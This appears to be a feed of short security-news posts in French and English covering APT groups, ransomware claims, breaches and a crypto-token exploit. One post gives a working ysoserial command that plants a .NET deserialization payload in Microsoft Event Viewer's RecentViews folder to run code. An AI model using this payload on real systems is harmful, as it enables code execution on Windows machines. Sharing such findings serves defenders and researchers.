Plus récents

ESET researchers reveal a detailed profile of TA410 ( linked to APT10 ) : we believe this cyberespionage umbrella group consists of 3 different teams using different toolsets

welivesecurity.com/2022/04/27/

Les opérateurs Vice Society revendiquent, 4 mois après les faits, l'attaque ciblant l'établissement public territorial Est Ensemble (est-ensemble.fr)

SOPHOS - The State of Ransomware 2022 / Among private sector companies, 86% of those surveyed by Sophos said that a ransomware attack caused them to lose business or revenue.

assets.sophos.com/X24WTUEQ/at/

🇳🇴 The personal data of 15,497 customers was leaked from a reservation system used by Hotel Kämp and the F6 hotel in a February 2022 breach, according to the Nordic Hotels & Resorts company. The breach also affected other hotels in 🇫🇮 Finland.

yle.fi/news/3-12417602

🇰🇵 North Korea will speed up development of its nuclear arsenal, leader Kim Jong Un said while overseeing a huge military parade that displayed intercontinental ballistic missiles (ICBMs) and other weapons

reuters.com/video/watch/idsvHm

🇺🇸 Austin Peay State University (apsu.edu) announced that they are under a ransomware attack.

🇨🇳 Beijing spooks are behind 18 drone sightings above UK military sites. The details of the drone activity were uncovered under freedom of information laws. A letter sent by MI6 security chiefs said Chinese spies are « aggressively » targeting 🇬🇧 British spooks and their families. Sources said the Chinese Foreign Intelligence Service is using tactics such as offers of sex, theft and cybercrime.

dailyrecord.co.uk/news/scottis

Unsafe .Net Deserialization in Microsoft Event Viewer

ysoserial.exe -o raw -f BinaryFormatter -g DataSet -c calc > %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews

// credit: Orange Tsai

🇫🇷 Depuis plusieurs semaines, des photos d'identité nécessaires pour constituer les dossiers des candidats au permis de conduire sont refusées par l'Agence Nationale des Titres Sécurisés (immatriculation.ants.gouv.fr). La faute à un « bug » informatique affectant les clichés pris dans un Photomaton ®.

ledauphine.com/economie/2022/0

🇵🇪 Les opérateurs Conti revendiquent une attaque contre Dirección Nacional de Inteligencia (digimin.gob.pe)

Un attaquant profite d'une faille du système de gestion de la cryptomonnaie YEED. Grâce à l'achat et la revente successive et massive, l’utilisateur a pu générer des jetons de récompense qu’il a conservés afin de constituer son butin. Malheureusement, à la fin de l'attaque, ce dernier a oublié de récupérer ledit butin. Est-ce une erreur ? Cette attaque pourrait donc paraitre sans conséquence ni malheur. Et pourtant, basée sur la revente massive de jeton, a radicalement fait chuter le cours du YEED, ce dernier ne valant plus rien.

phonandroid.com/il-pirate-1-mi

Plus anciens